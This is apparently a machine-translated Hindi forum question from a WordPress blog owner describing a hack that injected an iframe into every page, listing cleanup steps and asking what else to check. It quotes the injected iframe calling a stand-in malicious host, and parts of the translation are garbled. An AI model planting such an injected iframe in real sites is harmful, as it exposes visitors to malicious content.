Http://fakeplasticrock.com पर मेरा मज़ेदार WordPress ब्लॉग (WordPress 3.1.1 चल रहा है) हैक हो गया - ऐसा <iframe>
हर पेज पर दिखाई दे रहा था :
<iframe src="http://evilsite.com/go/1"></iframe>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
मैंने निम्नलिखित किया
- अंतर्निहित वर्डप्रेस अपग्रेड सिस्टम के माध्यम से 3.1.3 पर अपग्रेड किया गया
- स्थापित स्कैनर शोषण और (असामान्य फाइलों पर महत्वपूर्ण चेतावनी के बहुत सारे) एंटीवायरस (यह सब हरे और स्वच्छ से पता चला है, इसलिए मैं स्थापना हटाई और चल रहा है के बाद इसे हटा दिया)
- परिवर्तित MySQL पासवर्ड।
- सभी वर्डप्रेस यूजर पासवर्ड बदल दिए।
- एफ़टीपी के माध्यम से जुड़ा हुआ है और पूरे फाइलसिस्टम को डाउनलोड किया है (बड़ा नहीं है, यह एक वर्डप्रेस-ओनली लिनक्स साझा होस्ट है)
- वर्डप्रेस 3.1.3 के एक अधिकारी ज़िप के खिलाफ फाइल सिस्टम diffed किये जाने वाले और हटाया या ओवरराइट कर कुछ भी है कि मेल नहीं खाती।
मुझे पूरा यकीन है कि
- डिस्क पर सभी फाइलें आधिकारिक वर्डप्रेस 3.1.3 फाइलें हैं
- मेरे एक के अलावा डिस्क पर कोई "अतिरिक्त" फाइलें नहीं हैं
/theme
, एक्सप्लॉइट स्कैनर प्लगइन (जो मैंने अभी डाउनलोड किया है),/uploads
फ़ोल्डर, और अन्य अपेक्षित फ़ाइलों का एक छोटा मुट्ठी भर। मेरे अन्य प्लगइन, wp-recaptcha, वर्तमान आधिकारिक डाउनलोड किए गए संस्करण से मेल खाते हैं। - मैंने
.htaccess
फाइल भी चेक की और वहां कुछ भी गलत नहीं लगा
मैंने डेटाबेस को नहीं छुआ , लेकिन मैं यह सोचने के लिए संघर्ष कर रहा हूं कि डेटाबेस में कुछ भी विशेष PHP कोड के बिना दुर्भावनापूर्ण हो सकता है ताकि यह काम कर सके?
मेरा वर्डप्रेस ब्लॉग अब ठीक है और हैक-मुक्त दिखाई देता है (मुझे लगता है), लेकिन क्या मुझे जाँचना चाहिए?